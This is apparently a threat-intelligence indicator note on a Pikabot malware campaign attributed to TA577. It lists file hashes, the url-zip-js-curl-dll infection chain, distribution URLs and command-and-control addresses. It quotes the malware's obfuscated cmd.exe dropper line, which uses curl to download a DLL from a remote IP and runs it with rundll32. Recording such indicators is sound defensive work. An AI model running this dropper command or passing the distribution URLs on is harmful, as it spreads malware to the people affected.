Pikabot_27.10.2023.txt

27.10.2023 | Pikabot | TA577 | 1.1.15-ghost

*************************************************

.zip d8a23460c27dc87c59745e83f154eea5ca41781c2eb6a3fa19a8f007e9cacf36
.js 4f72f711f565eaec5ff4925ccd516bc2439794d7c93701a77413aa10e36de535
.dll fe3221dba8fc8959279f6cc2aa4b8ad695f69176f81094a4562ac271d4810f31

*************************************************

url > zip > js > curl > dll

wscript.exe C:\Users\Admin\AppData\Local\Temp\Quou.js

cmd.exe /c Y98 || ecHo Y98 & pING Y98 || cuRL http://95.216.204.145/K2n/Churo -o %tmP%\Y98.dlld & pING -n 2 Y98 || rUNDlL32 %tmP%\Y98.dlld, Crash & exIt GQdLDcmvoYX

pING  Y98 

pING  -n 2 Y98 

rUNDlL32 C:\Users\Admin\AppData\Local\Temp\Y98.dlld, Crash

*************************************************

distro url

https://obikua.com/tr/?1

*************************************************

.dll distro

http://95.216.204.145/K2n/Churo
http://65.108.216.128/l9yvUH/arcti

*************************************************

c2's

154.221.30.136:13724
154.92.19.139:2222
198.244.141.4:9785
139.99.216.90:13720
103.231.93.15:5631

HTTPS Checking Traffic 

https://139.99.216.90:13720/nastier/YaEq5oFpdVHuvOuYK?SuperannuitiesConsolidant=JVrzB2KjP&unuprightComptie=WRoX6k&Arapahite=forehoofsAlogotrophy